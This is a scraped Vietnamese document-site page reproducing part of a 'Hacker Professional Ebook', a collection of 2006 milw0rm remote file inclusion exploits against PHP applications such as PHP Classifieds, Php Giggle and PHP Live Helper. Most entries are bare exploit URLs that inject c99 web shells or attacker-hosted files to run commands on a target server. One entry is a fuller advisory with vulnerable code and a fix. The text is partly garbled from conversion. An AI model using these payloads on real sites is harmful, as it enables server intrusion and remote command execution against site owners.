1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 405 pdf

5 136 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 5
Dung lượng 59,26 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

"/kernel/public/fileio.func.php"; //once the file I/O wrapper is brought up, it is convenient to use //function fileInclude ..... Key [:] CFG_PHPGIGGLE_ROOT=[file] Example: http://target

Trang 1

,www.lezr.com

==================================I LOVE SAUDI

ARABIA============================================ =#

# milw0rm.com [2006-09-15]

navaro(HCE)

PHP Classifieds 7.1 - Remote File Include Vulnerability

xploit:

site.com/[path]/functions.php?set_path=conc99

trang chủ: manual.deltascripts.com/

Black_hat_cr(HCE)

PHP Event Calendar PHP Event Calendar 1.4

xploit:

Code:

http://www.VicTim.com/[Script_Path]/cl_files/index.php?path_to_calendar=c99

Black_hat_cr(HCE)

hp Giggle <= 12.08 Remote File Include Vulnerability

PHP Code:

**************************************************************

*****************

# Title : Php Giggle <= 12.08 Remote File Include Vulnerability

# Author : ajann

# Vuln;

Trang 2

*****************

[File]

startup.php

[/File]

[Code,1]

startup.php Error:

include($CFG_PHPGIGGLE_ROOT $CFG_MODULE_ROOT

"/kernel/system/modregistry.inc.php");

include($CFG_PHPGIGGLE_ROOT $CFG_MODULE_ROOT

"/kernel/public/msg.func.php");

include($CFG_PHPGIGGLE_ROOT $CFG_MODULE_ROOT

"/kernel/public/fileio.func.php");

//once the file I/O wrapper is brought up, it is convenient to use

//function fileInclude

Key [:] CFG_PHPGIGGLE_ROOT=[file]

Example:

http://target.com/path/modules/kernel/system/startup.php?CFG_PHPGIGGL E_ROOT=[Shell]

Black_hat_cr(HCE)

PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion Vulnerability

Code:

Trang 3

\_ _/\_ _ \ / | \\ _ \

| )_ / \ \// ~ \/ | \

| \\ \ _\ Y / | \

/ _ / \ /\ _|_ /\ _ /

\/ \/ \/ \/ OR.ID

ECHO_ADV_43$2006

-

[ECHO_ADV_43$2006] PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion

-

Author : Ahmad Maulana a.k.a Matdhule

Date Found : July, 02nd 2006

Location : Indonesia, Jakarta

web : http://advisories.echo.or.id/adv/adv4333-matdhule-2006.txt Critical Lvl : Highly critical

Impact : System access

Where : From Remote

-

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PHP Live Helper

Application : PHP Live Helper

version : Latest version [2.0]

URL : http://www.turnkeywebtools.com/phplivehelper

-

Vulnerability:

~~~~~~~~~~~~~~

-global.php -

<?PHP

/*

global.php - 05/30/2006 - 5:27pm PST - 2.0

Trang 4

PHP Live Helper

http://www.turnkeywebtools.com/phplivehelper/

Copyright (c) 2001-2006 Turnkey Web Tools, Inc

*/

define('PLH_SESSION_START', '1');

////////////////////////////

// Load Class & Secure Files

////////////////////////////

require_once $abs_path."/libsecure.php";

include_once $abs_path."/include/class.browser.php";

-

Input passed to the "abs_path" parameter in global.php is not

properly verified before being used This can be exploited to execute

arbitrary PHP code by including files from local or external

resources

Proof Of Concept:

~~~~~~~~~~~~~~~

http://target.com/[phplivehelper_path]/global.php?abs_path=http://attacker.com/inj ect.txt?

Solution:

~~~~~~~

- Sanitize variable $abs_path on global.php

Notification:

~~~~~~~~~~

I've been contacting the web/software administrator to tell about this hole in his system,

but instead of giving a nice response, he replied so rudely and arrogantly

Trang 5

I recommend not to use this product for your own sake

-

Shoutz:

~~~

~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :)

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama

~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com

~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net

-

-

Contact:

~~~~

matdhule[at]gmail[dot]com

- [ EOF ] -

# milw0rm.com [2006-08-07]

vns3curity(HCE)

PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities

Xploit:

Code:

http://[target]/[path]/setup/header.php?css_path=http://shell.txt?cm

d=ls

black_hat_cr(HCE)

PHP MyWebMin 1.0 Remote File Include

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN